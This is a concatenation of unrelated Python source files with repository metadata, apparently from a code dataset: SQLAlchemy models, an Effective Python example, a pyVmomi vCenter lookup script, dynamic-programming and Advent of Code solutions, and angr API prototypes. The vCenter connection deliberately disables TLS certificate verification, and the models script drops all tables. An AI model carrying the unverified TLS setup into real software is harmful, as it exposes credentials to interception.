    nickname = Column(String(60))
    img_url = Column(String(3000))
    # img_url: is there really no need to shorten these URLs?
    birthday = Column(String(60))
    sex = Column(Integer)
    height = Column(Integer)
    weight = Column(Integer)
    area = Column(String(30))
    #so what the lambda used for? http://docs.sqlalchemy.org/en/latest/orm/basic_relationships.html#one-to-one
    join_event = relationship('UserEvent',
        backref='the_user',
        passive_deletes = True
    )
    host_event = relationship('Event',backref='hoster',passive_deletes=True)
    def __init__(self,nickname='匿名',img_url='http://120.27.163.43:8001/static/common.jpg',sex=1,birthday='1996-06-19',height=None,weight=None,area=""):
        """Defaults: anonymous nickname, placeholder avatar; when height /
        weight are omitted they default by sex (sex truthy -> 170cm/60kg,
        else 165cm/50kg -- presumably 1 means male, confirm)."""
        self.nickname = nickname
        self.img_url = img_url
        self.sex = sex
        self.birthday = birthday
        self.area = area
        if height:
            self.height = height
        else:
            self.height = 170 if self.sex else 165
        self.weight = weight if weight else 60 if self.sex else 50
'''
def change_info(self,nickname,img_url,sex,age):
self.nickname = nickname
self.img_url = img_url
self.sex = sex
self.age = age
'''
class Event(Base):
    """An orienteering event: location, schedule, capacity, host, and its
    checkpoint (`Points`) collection."""
    __tablename__ = 'events'
    id = Column(String(50),primary_key=True)
    title = Column(Text)
    # Event coordinates -- presumably longitude/latitude; confirm axis order.
    loc_x = Column(Float)
    loc_y = Column(Float)
    loc_province = Column(String(20))
    loc_distract = Column(String(1000))
    loc_city = Column(String(30))
    loc_road = Column(String(400))
    desc = Column(Text)
    person_limit = Column(Integer)
    person_current= Column(Integer)
    start_time = Column(String(20))
    during_time = Column(String(20))
    type = Column(Integer)
    logo = Column(String(3000))
    host = Column(Integer,ForeignKey('userinfo.id'))
    # Deleting an event cascades to its checkpoints.
    points = relationship("Points",backref='point_event',cascade='save-update,merge,delete')
    userinfo_id = relationship(
        'UserEvent',
        backref = 'the_event',
        passive_deletes = True
    )
    def __init__(self,title=None,desc=None,start_time=None,
                 during_time=60,loc_x=None,loc_y=None,
                 loc_province=None,person_limit=50,
                 loc_distract=None,loc_road=None,loc_city=None,
                 logo=None,host=None,type=0):
        """Create an event with a fresh UUID id and zero participants.

        Bug fix: the parameter was previously misspelled ``c_distract``
        while the body assigned the undefined name ``loc_distract``, so
        every ``Event(...)`` call raised NameError. The parameter is now
        ``loc_distract``, matching the column and the body.
        """
        self.id = str(uuid.uuid4())
        self.title = title
        self.desc = desc
        self.start_time = start_time
        self.during_time= during_time
        self.loc_x = loc_x
        self.loc_y = loc_y
        self.loc_province = loc_province
        self.loc_road = loc_road
        self.loc_distract = loc_distract
        self.loc_city = loc_city
        self.person_limit = person_limit
        self.person_current = 0
        self.logo = logo
        self.host = host
        self.type = type
    def __repr__(self):
        return "<Event (id='%s',title='%s')"%(self.id,self.title)
class Points(Base):
    """A checkpoint of an event: position, trigger radius, message, and
    visiting order."""
    __tablename__ = 'points'
    id = Column(Integer,primary_key=True)
    x = Column(Float)
    y = Column(Float)
    message = Column(Text())
    radius = Column(Float)
    type = Column(Integer)
    order = Column(Integer)
    # Owning event (relationship 'points' with delete cascade on Event).
    event_re = Column(String(50),ForeignKey('events.id'))
    def __init__(self,x=None,y=None,message=None,radius=None,order=None,type=1):
        self.x = x
        self.y = y
        self.order = order
        self.radius = radius
        self.message = message
        self.type=type
'''
class EventDetail(Base):
__tablename__ = 'eventdetail'
id = Column(Integer,primary_key=True)
event_re = Column(String(50),ForeignKey('events.id'))
'''
if __name__ == '__main__':
    # WARNING: drop_all destroys every mapped table (and all data) before
    # recreating the schema -- run only against a disposable database.
    Base.metadata.drop_all(engine)
    Base.metadata.create_all(engine)
| [
"1152761042@qq.com"
] | 1152761042@qq.com |
5f06320ea1348040f92e9b3d949bae91e0e5f7a1 | deb08f802e3fdfbe9e1918ff12cc755cbd2a679f | /2_CH/Keyword.py | 746a45836ddb422b186b3a26e7470b24f7240581 | [] | no_license | t-a-y-l-o-r/Effective_Python | b6cf9d197664b64635f131fab503494387b13257 | 84ac7b1fb3e3a8ce7c64b865f7e5fbfb03159368 | refs/heads/master | 2021-01-24T19:38:43.985278 | 2018-03-22T23:24:33 | 2018-03-22T23:24:33 | 123,243,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,397 | py | '''
Author: Taylor Cochran
Book: Effective Python
Ch: 2
goal: Enforce clarity with Keyword-only arguments
'''
# division that ignores errors
# requires the user to remember the position of each argument
# possibly resulting in subtle bugs down the line
def safe_division(number, divisior, ignore_overflow, ignore_zero_division):
    """Divide ``number`` by ``divisior``, optionally suppressing errors.

    ``ignore_overflow`` maps OverflowError to 0; ``ignore_zero_division``
    maps ZeroDivisionError to +infinity. Otherwise the exception
    propagates. (Positional boolean flags make call sites hard to read --
    see the keyword-only variant below for the preferred interface.)
    """
    try:
        return number / divisior
    except OverflowError:
        if not ignore_overflow:
            raise
        return 0
    except ZeroDivisionError:
        if not ignore_zero_division:
            raise
        return float("inf")
# result = safe_division(1.0, 10**500, True, False)
# print(result)
# result = safe_division(1.0, 0, False, True)
# print(result)
# instead FORCE keyword arguments to be passed, resulting in clear intention
def safe_division(number, divisior, *,
        ignore_overflow=False, ignore_zero_division=False):
    '''Divides the two numbers passed.

    Args:
        number: The numerator.
        divisor: The divisor.
        ignore_overflow: when True, return 0 instead of raising
            OverflowError. Defaults to False.
        ignore_zero_division: when True, return float('inf') instead of
            raising ZeroDivisionError. Defaults to False.
    '''
    try:
        return number / divisior
    except OverflowError:
        if not ignore_overflow:
            raise
        return 0
    except ZeroDivisionError:
        if not ignore_zero_division:
            raise
        return float("inf")
| [
"taylorjcochran@hotmail.com"
] | taylorjcochran@hotmail.com |
3cd515eca280170fe3a32456a2936ef77006c086 | 286b6dc56323f982092ffafbfac8a32dbbaeb7ef | /Day_09/sample_pyvmomi.py | 10033c34292fb7b9d33af55fc34b5e48284d85bb | [] | no_license | learndevops19/pythonTraining-CalsoftInc | ccee0d90aadc00bfdb17f9578620f6bf92f80a4c | c5f61516b835339b394876edd1c6f62e7cc6f0c3 | refs/heads/master | 2021-02-05T04:27:17.590913 | 2019-11-20T17:27:06 | 2019-11-20T17:27:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,761 | py | import ssl
from pyVim import connect
from pyVmomi import vim
def connectVcenter(vCenterHost, username, password, portNum=443):
    """
    Description : Performs vCenter connection.
    Parameters  : vCenterHost - vCenter server ip address (STRING)
                  username - vCenter server username (STRING)
                  password - vCenter server password (STRING)
                  portNum - Port number for connection, default is 443 (INT)
    Returns     : Service instance object
    """
    # SECURITY NOTE: TLS certificate verification is disabled here
    # (_create_unverified_context) -- acceptable only for lab/test use.
    context = ssl._create_unverified_context()
    si = connect.SmartConnect(
        host=vCenterHost, user=username, pwd=password, port=portNum, sslContext=context
    )
    return si
def getObj(content, vimtype, name):
    """
    Description: Get the vsphere object associated with a given text name
    Parameters : content - Data object having properties for the
                           ServiceInstance managed object (OBJECT)
                 vimtype - Managed object type (OBJECT)
                 name - Managed object entity name (STRING)
    Return: Matched Managed object (OBJECT), or None when nothing matches
    """
    container = content.viewManager.CreateContainerView(
        content.rootFolder, vimtype, True
    )
    # NOTE(review): the ContainerView is never destroyed (container.Destroy());
    # long-running callers may leak server-side view objects -- confirm.
    for vmObj in container.view:
        if vmObj.name == name:
            return vmObj
    # Falls through to an implicit None when no object matches.
def getDatacenterByName(si, name):
    """
    Description: Find a datacenter by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - datacenter name (STRING)
    Return: datacenter Object (OBJECT), or None when not found
    """
    return getObj(si.RetrieveContent(), [vim.Datacenter], name)
def getClusterByName(si, name):
    """
    Description: Find a cluster by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - cluster name (STRING)
    Return: cluster Object (OBJECT), or None when not found
    """
    return getObj(si.RetrieveContent(), [vim.ClusterComputeResource], name)
def getHostByName(si, name):
    """
    Description: Find a host by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - host name (STRING)
    Return: host Object (OBJECT), or None when not found
    """
    return getObj(si.RetrieveContent(), [vim.HostSystem], name)
def getVirtualMachineByName(si, name):
    """
    Description: Find a vm by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - vm name (STRING)
    Return: virtual machine Object (OBJECT), or None when not found
    """
    return getObj(si.RetrieveContent(), [vim.VirtualMachine], name)
def getDatastoreByName(si, name):
    """
    Description: Find a datastore by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - datastore name (STRING)
    Return: datastore Object (OBJECT), or None when not found
    """
    return getObj(si.RetrieveContent(), [vim.Datastore], name)
def getNetworkByName(si, name, isVDS=False):
    """
    Description: Find a network by it's name and return it
    Parameters : si - vCenter connection session (OBJECT)
                 name - network name (STRING)
                 isVDS - look up a distributed virtual portgroup instead
                         of a standard network when not False (BOOL)
    Return: network Object, or None when no match is found
    """
    # Preserve the original exact identity test: only the literal False
    # selects the standard-network branch.
    vim_type = [vim.Network] if isVDS is False else [vim.dvs.DistributedVirtualPortgroup]
    return getObj(si.RetrieveContent(), vim_type, name)
# connect vcenter
# NOTE(review): vcenterIp / vcenterUsername / vcenterPassword are never
# defined in this file, so running it as-is raises NameError -- they must
# be set (or imported) before this line.
siObj = connectVcenter(vcenterIp, vcenterUsername, vcenterPassword)
# print(siObj.content.about)
# get datacenter by name
datacenterName = "UCP CI Datacenter"
datacenterObj = getDatacenterByName(siObj, datacenterName)
print("datacenterName is", datacenterObj.name, datacenterObj.datastore[0].name)
# get cluster by name
# clusterName = 'Dockerized'
# clusterObj = getClusterByName(siObj, clusterName)
# print("clusterName is", clusterObj.name)
# get host by name
# hostName = '192.168.25.205'
# hostObj = getHostByName(siObj, hostName)
# print("hostName is", hostObj.name)
# get datastore by name
# datastoreName = 'ds1'
# datastoreObj = getDatastoreByName(siObj, datastoreName)
# print("datastoreName is", datastoreObj.name)
# get network by name
# networkName = 'VM Network'
# networkObj = getNetworkByName(siObj, networkName)
# print("networkName is", networkObj.name)
# print("Vm's in this network", [vm.name for vm in networkObj.vm])
# get all vms inside datacenter
# vmsList = datacenterObj.vmFolder.childEntity
# for vm in vmsList:
#     print("Virtual Machine - ", vm.name)
# get vm by name
# vmObj = getVirtualMachineByName(siObj, 'k8s-master')
# print('VirtualMachineName', vmObj.name, dir(vmObj))
# poweroff the above virtual machine
# vmObj.PowerOff()
# poweron the above virtual machine
# vmObj.PowerOn()
| [
"rajpratik71@gmail.com"
] | rajpratik71@gmail.com |
f23d62dafdbb77a295d93ac632a4441e517a6c10 | c92d5b8509f23444622529aa24d4bc85bf1d3c9f | /main/question47/book1.py | 44b832b082eb8ed9403996e4f3f5e5ee8a3f4ad1 | [] | no_license | qcymkxyc/JZoffer | 75dfb747394018f14552f521413b01a5faa9c07f | 28628616589061653a8322d5b400f9af32f2249d | refs/heads/master | 2021-07-15T00:53:00.711360 | 2019-02-10T03:16:52 | 2019-02-10T03:16:52 | 149,714,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | #!/usr/bin/env python
# _*_coding:utf-8_*_
"""
@Time : 19-1-24 上午10:58
@Author: qcymkxyc
@File: book1.py
@Software: PyCharm
"""
def max_value(matrix):
    """Maximum sum along a top-left -> bottom-right path (moves: right/down).

    Dynamic programming over a table of best path sums (JZoffer
    question 47, "gift with maximum value").

    :param matrix: List[List[int]]
        rectangular grid of values
    :return: int
        best achievable sum; 0 for an empty grid (bug fix: the original
        raised IndexError on ``[]`` or ``[[]]``)
    """
    if not matrix or not matrix[0]:
        return 0
    n_row, n_col = len(matrix), len(matrix[0])
    best = [[0] * n_col for _ in range(n_row)]
    # First row / first column can only be reached one way: running sums.
    best[0][0] = matrix[0][0]
    for col in range(1, n_col):
        best[0][col] = best[0][col - 1] + matrix[0][col]
    for row in range(1, n_row):
        best[row][0] = best[row - 1][0] + matrix[row][0]
    # Every other cell extends the better of its top / left neighbour.
    for row in range(1, n_row):
        for col in range(1, n_col):
            best[row][col] = max(best[row - 1][col], best[row][col - 1]) + matrix[row][col]
    return best[-1][-1]
| [
"qcymkxyc@163.com"
] | qcymkxyc@163.com |
8168b5bf889b97e447da255e86d69e116f571d47 | c8975f8bbe32637399a3ca00ad21e8e6602e358d | /aoc/year2021/day14/day14.py | bf40f0314c32c659180cf4eaa5ae69c3475ea98d | [
"Unlicense"
] | permissive | Godsmith/adventofcode | 0e8e0beb813300206b2810b523b54a6c40ca936f | 3c59ea66830f82b63881e0ea19bfe3076f2a500d | refs/heads/master | 2021-12-28T13:05:42.579374 | 2021-12-26T22:19:55 | 2021-12-26T22:24:01 | 225,074,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | from collections import Counter
from aocd import get_data
from more_itertools import pairwise
def run(data, iterations):
new_element_from_pair = {tuple(line.split(" -> ")[0]): line.split(" -> ")[1] for line in data.splitlines()[2:]}
new_pairs_from_pair = {(e1, e2): [(e1, inserted), (inserted, e2)] for (e1, e2), inserted in new_element_from_pair.items()}
template = data.splitlines()[0]
element_counter = Counter(template)
pair_counter = Counter(pairwise(template))
for _ in range(iterations):
new_pair_counter = Counter()
for pair in pair_counter:
for new_pair in new_pairs_from_pair[pair]:
new_pair_counter[new_pair] += pair_counter[pair]
element_counter[new_element_from_pair[pair]] += pair_counter[pair]
pair_counter = new_pair_counter
return element_counter.most_common()[0][1] - element_counter.most_common()[-1][1]
# Fetch the puzzle input via aocd and print part 1 (10 steps) and part 2 (40).
print(run(get_data(), 10))
print(run(get_data(), 40))
| [
"filip.lange@gmail.com"
] | filip.lange@gmail.com |
5802eeeb0ab8d6f8d89deb95c876c1ac27840b2a | 4fc9cb4cf01e41c4ed3de89f13d213e95c87dd33 | /angr/procedures/definitions/win32_wdsclientapi.py | dcbb07c74c314d0c5708a98cc0f55187713044fc | [
"BSD-2-Clause"
] | permissive | mborgerson/angr | ea5daf28576c3d31b542a0e229139ab2494326e9 | 8296578e92a15584205bfb2f7add13dd0fb36d56 | refs/heads/master | 2023-07-24T22:41:25.607215 | 2022-10-19T19:46:12 | 2022-10-20T18:13:31 | 227,243,942 | 1 | 2 | BSD-2-Clause | 2021-04-07T22:09:51 | 2019-12-11T00:47:55 | Python | UTF-8 | Python | false | false | 14,784 | py | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
# Module-level wiring for the WDS client API procedure-summary library.
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
# Default calling conventions per architecture: stdcall on 32-bit x86, the
# Microsoft x64 convention on AMD64.
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("wdsclientapi.dll")
prototypes = \
{
#
'WdsCliClose': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle"]),
#
'WdsCliRegisterTrace': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="SByte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pwszFormat", "Params"]), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pfn"]),
#
'WdsCliFreeStringArray': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ppwszArray", "ulCount"]),
#
'WdsCliFindFirstImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "phFindHandle"]),
#
'WdsCliFindNextImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle"]),
#
'WdsCliGetEnumerationFlags': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle", "pdwFlags"]),
#
'WdsCliGetImageHandleFromFindHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["FindHandle", "phImageHandle"]),
#
'WdsCliGetImageHandleFromTransferHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer", "phImageHandle"]),
#
'WdsCliCreateSession': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"pwszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="WDS_CLI_CRED", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszServer", "pCred", "phSession"]),
#
'WdsCliAuthorizeSession': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"pwszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="WDS_CLI_CRED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "pCred"]),
#
'WdsCliInitializeLog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="CPU_ARCHITECTURE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "ulClientArchitecture", "pwszClientId", "pwszClientAddress"]),
#
'WdsCliLog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "ulLogLevel", "ulMessageCode"]),
#
'WdsCliGetImageName': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageDescription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageType': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="WDS_CLI_IMAGE_TYPE"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pImageType"]),
#
'WdsCliGetImageFiles': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pppwszFiles", "pdwCount"]),
#
'WdsCliGetImageLanguage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageLanguages': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="SByte"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pppszValues", "pdwNumValues"]),
#
'WdsCliGetImageVersion': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImagePath': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageIndex': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pdwValue"]),
#
'WdsCliGetImageArchitecture': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="CPU_ARCHITECTURE"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pdwValue"]),
#
'WdsCliGetImageLastModifiedTime': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({"wYear": SimTypeShort(signed=False, label="UInt16"), "wMonth": SimTypeShort(signed=False, label="UInt16"), "wDayOfWeek": SimTypeShort(signed=False, label="UInt16"), "wDay": SimTypeShort(signed=False, label="UInt16"), "wHour": SimTypeShort(signed=False, label="UInt16"), "wMinute": SimTypeShort(signed=False, label="UInt16"), "wSecond": SimTypeShort(signed=False, label="UInt16"), "wMilliseconds": SimTypeShort(signed=False, label="UInt16")}, name="SYSTEMTIME", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppSysTimeValue"]),
#
'WdsCliGetImageSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pullValue"]),
#
'WdsCliGetImageHalName': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageGroup': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageNamespace': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageParameter': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="WDS_CLI_IMAGE_PARAM_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ParamType", "pResponse", "uResponseLen"]),
#
'WdsCliGetTransferSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pullValue"]),
#
'WdsCliSetTransferBufferSize': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeBottom(label="Void"), arg_names=["ulSizeInBytes"]),
#
'WdsCliTransferImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypeInt(signed=False, label="PFN_WDS_CLI_CALLBACK_MESSAGE_ID"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["dwMessageId", "wParam", "lParam", "pvUserData"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hImage", "pwszLocalPath", "dwFlags", "dwReserved", "pfnWdsCliCallback", "pvUserData", "phTransfer"]),
#
'WdsCliTransferFile': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypeInt(signed=False, label="PFN_WDS_CLI_CALLBACK_MESSAGE_ID"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["dwMessageId", "wParam", "lParam", "pvUserData"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszServer", "pwszNamespace", "pwszRemoteFilePath", "pwszLocalFilePath", "dwFlags", "dwReserved", "pfnWdsCliCallback", "pvUserData", "phTransfer"]),
#
'WdsCliCancelTransfer': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer"]),
#
'WdsCliWaitForTransfer': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer"]),
#
'WdsCliObtainDriverPackages': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hImage", "ppwszServerName", "pppwszDriverPackages", "pulCount"]),
#
'WdsCliObtainDriverPackagesEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "pwszMachineInfo", "ppwszServerName", "pppwszDriverPackages", "pulCount"]),
#
'WdsCliGetDriverQueryXml': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszWinDirPath", "ppwszDriverQuery"]),
}
lib.set_prototypes(prototypes)
| [
"noreply@github.com"
] | noreply@github.com |
a9e19bfcc0e74994f1eb9372e893415376fb7333 | 54bbfcd35f93ea035fa33d4567bb61b9f9972c86 | /detection_tool/demo_xor.py | dc938eac71baad2aa237cc4b39caf527039ba17a | [] | no_license | seunghan-ga/IDA | 88100643fb7b07802985dad57052614ced573c6a | 2b3f7408133ee12dc5178281117f9305ad85eb5e | refs/heads/master | 2022-12-11T23:56:08.766957 | 2020-08-12T05:20:36 | 2020-08-12T05:20:36 | 241,831,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,930 | py | import argparse
import shutil
import time
import cv2
import sys
import os
